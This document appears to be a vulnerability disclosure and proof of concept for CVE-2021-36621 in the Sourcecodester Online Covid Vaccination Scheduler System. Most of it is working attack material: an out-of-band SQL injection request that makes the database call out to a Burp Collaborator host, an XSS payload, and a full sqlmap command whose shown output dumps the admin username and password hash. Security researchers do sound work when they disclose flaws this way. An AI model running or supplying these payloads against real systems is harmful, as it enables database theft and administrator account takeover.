## [CVE-2021-36621](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36621)
## [Vendor](https://www.sourcecodester.com/php/14847/online-covid-vaccination-scheduler-system-php-free-source-code.html)
## Description
Sourcecodester Online Covid Vaccination Scheduler System 1.0 is vulnerable to SQL Injection, XSS-STORED PHPSESSID Hijacking, and remote SQL Injection – bypass Authentication.
The attacker can be hijacking the PHPSESSID by using this vulnerability and then he can log in to the system and exploit the admin account.
Next, exploitation: For MySQL vulnerability, the username parameter is vulnerable to time-based SQL injection. Upon successful dumping the admin password hash, an attacker can decrypt and obtain the plain-text password. Hence, the attacker could authenticate as an Administrator.
## Request MySQL:
GET /scheduler/addSchedule.php?lid=(select%20load_file(‘%5c%5c%5c%5ciugn0izvyx9wrtoo6c6oo16xeokh87wyymp9fx4.burpcollaborator.net%5c%5cgfd’))&d= HTTP/1.1
Host: localhost
Cookie: PHPSESSID=30nmu0cj0blmnevrj5arrk8hh3
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
## Respond MySQL:
HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 11:17:00 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 5045
Connection: close
Content-Type: text/html; charset=UTF-8
<style>
#uni_modal .modal-content>.modal-header,#uni_modal .modal-content>.modal-footer{
display:none;
}
#uni_modal .modal-body{
padding-top:0 !important;
}
#location_modal{
direct
…[SNIP]…
## Live test:
http://localhost/scheduler/addSchedule.php?lid=(select%20load_file(%27%5c%5c%5c%5ciugn0izvyx9wrtoo6c6oo16xeokh87wyymp9fx4.burpcollaborator.net%5c%5cgfd%27))
– proof:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/CVE-nu11-18-09-2821/docs/scheduler-CVE-Critical.gif
—————————————————————————————————————————————–
## Request XSS:
GET /scheduler/addSchedule.php?lid=5&d=v6qfw%3cscript%3ealert(1)%3c%2fscript%3eytpic HTTP/1.1
Host: localhost
Cookie: PHPSESSID=30nmu0cj0blmnevrj5arrk8hh3
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
## Respond XSS:
HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 11:16:57 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 4576
Connection: close
Content-Type: text/html; charset=UTF-8
<style>
#uni_modal .modal-content>.modal-header,#uni_modal .modal-content>.modal-footer{
display:none;
}
#uni_modal .modal-body{
padding-top:0 !important;
}
#location_modal{
direct
…[SNIP]…
<h3>Schedule Form: (v6qfw<script>alert(1)</script>ytpic)</h3>
…[SNIP]…
———————————————————————————————————–
## Live test:
– proof:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/CVE-nu11-18-09-2821/docs/XSS.gif
———————————————————————————————————–
## PoC:
python sqlmap.py python C:UsersvenvaroptDesktopCVEsqlmapsqlmap.py -u “http://localhost/scheduler/classes/Login.php?f=login” –data=”username=admin&password=nu11secur1ty” –cookie=”PHPSESSID=30nmu0cj0blmnevrj5arrk8hh3″ –batch –answers=”crack=N,dict=N,continue=Y,quit=N” -D scheduler -T users -C username,password –dump
## OUTPUT:
POST parameter ‘username’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 157 HTTP(s) requests:
—
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin’ AND (SELECT 9211 FROM (SELECT(SLEEP(5)))oCqY) AND ‘giEC’=’giEC&password=nu11secur1ty
—
[19:49:38] [INFO] the back-end DBMS is MySQL
[19:49:38] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option ‘–time-sec’)? [Y/n] Y
web application technology: PHP 7.4.22, Apache 2.4.48
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[19:49:43] [INFO] fetching entries of column(s) ‘password,username’ for table ‘users’ in database ‘scheduler’
[19:49:43] [INFO] fetching number of column(s) ‘password,username’ entries for table ‘users’ in database ‘scheduler’
[19:49:43] [INFO] retrieved: 1
[19:49:49] [WARNING] (case) time-based comparison requires reset of statistical model, please wait………………………… (done)
[19:49:56] [INFO] adjusting time delay to 1 second due to good response times
0192023a7bbd73250516f069df18b500
[19:51:46] [INFO] retrieved: admin
[19:52:02] [INFO] recognized possible password hashes in column ‘password’
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] N
Database: scheduler
Table: users
[1 entry]
+———-+———————————-+
| username | password |
+———-+———————————-+
| admin | 0192023a7bbd73250516f069df18b500 |
+———-+———————————-+
[19:52:02] [INFO] table ‘scheduler.users’ dumped to CSV file ‘C:UsersvenvaroptAppDataLocalsqlmapoutputlocalhostdumpschedulerusers.csv’
[19:52:02] [INFO] fetched data logged to text files under ‘C:UsersvenvaroptAppDataLocalsqlmapoutputlocalhost’
[*] ending @ 19:52:02 /2021-09-28/
C:UsersvenvaroptDesktopscheduler-CVE-Critical-CVE-18-09-2821>
———————————————————————————————————–
## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/CVE-nu11-18-09-2821
## Proof:
https://streamable.com/zcp31i